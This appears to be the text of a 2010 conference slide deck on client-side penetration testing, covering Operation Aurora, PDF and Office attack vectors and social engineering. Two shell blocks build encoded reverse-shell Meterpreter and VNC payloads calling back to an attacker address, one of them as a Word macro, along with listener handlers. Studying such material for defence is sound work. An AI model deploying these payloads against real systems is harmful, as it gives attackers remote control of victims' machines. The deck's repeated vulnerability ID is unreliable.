What Works On Client Side Pentesting
CAMPUS PARTY COLOMBIA 2010
I’m a User / I’m a Pentester
iLife
kungfoosion.com
@kfs
www.linkedin.com/in/lpigner
Agenda
• Why Client Side?
• Operation Aurora
• Distribution and Attacks
• Conclusion

Why Client Side?
DIFFERENT TYPES OF PENETRATION TESTING
Phone Attacker: Wardialing is the best!
Network Attacker: No! I have a 0-day for IIS 6.0!
Social Engineer: Screw you! I just walk in.
[Diagram: ATTACKER on the INTERNET facing a Firewall, with a DMZ (SMTP, WWW), the LAN, the DOMAIN and the DATABASE behind it]
[Diagram: the same network with IPS, Reverse Proxy, IDS and Web App FW added in front of the DMZ]
[Diagram: ATTACKER on the INTERNET, Firewall, DMZ and LAN]
Operation Aurora
January 12, 2010
[2] Google Blog: A new approach to China
“highly sophisticated and targeted attacks ... originating from China”
30+ [1] Wikipedia: Operation Aurora
“Operation Aurora”
Google leaves China (?)
Google.cn
Google.com.ar
“illegal flower tribute”
[4] Wikipedia: Illegal flower tribute
Texas
Taiwan
PDF, DOC, XLS, CAD, E-mail
CAB, RAR
[3] Mandiant M-Trends “the advanced persistent threat”
and the rest...
0-day for IE 6, 7 and 8
[6] Wepawet exploit
[7] German government warns against using MS Explorer
- January 12: Google’s announcement
- January 14: Exploit on Wepawet
- January 14: Microsoft advisory
- January 15: Metasploit PoC
- January 21: Microsoft update (out-of-band)
DEMO #1 “Aurora”
www
More information at:
KUNGFOOSION: The CyberWar has broken out!

OSVDB 61697
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that led to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
Affects:
- Internet Explorer 6
- Internet Explorer 7
- Internet Explorer 8
Distribution and Attacks

payload + encoding
DEMO #2 “Payload + Encoding”

```shell
# Demo 2: the same reverse_tcp meterpreter payload, first as a plain executable ...
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 X > payload_1.exe
# ... then passed through several msfencode encoders before being written as an executable
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 3 -t exe -o payload_2.exe
# handler that waits for the reverse connection on port 443
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
```
You’ve got mail

CASE STUDY (?)
25000 mails
1883 interested
Browsers
Operating System
Java support
Flash versions
You’ve got mail
Open my attachment!
Most Used Files
[Chart: most used file types: DOC, XLS, PPT, PDF, others; values shown: 38%, 7%, 4%, 47%, 3%]
[8] PDF Based Target Attacks are Increasing

| Year | Count |
|------|-------|
| 2008 | 1968  |
| 2009 | 2195  |
| 2010 | 895   |
DEMO #3 “PDF Exploit”
More information at:
KUNGFOOSION: Exploiting the Adobe Reader 0-day

OSVDB 61697
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted PDF that contains a malformed util.printf() entry, an attacker may be able to execute arbitrary code.
Affects:
- Adobe Reader 8.1.2
DEMO #4 “PDF + EXE”
More information at:
KUNGFOOSION: Embedding an Executable inside a PDF with MetaSploit
DEMO #5 “Word”

```shell
# Demo 5: vncinject reverse_tcp payload exported as a VBA macro for a Word document
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 V > macro_word.bas
# handler that waits for the reverse connection on port 443
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
```
The Receptionist

DEMO #6 “USB U3”
More information at:
KUNGFOOSION: USB U3 Attack with MetaSploit

SET social engineering toolkit
“The Java Applet Attack”
More information at:
KUNGFOOSION: Social Engineering with signed Java Applets in MetaSploit

Thanks! kungfoosion.com
@kfs
www.linkedin.com/in/lpigner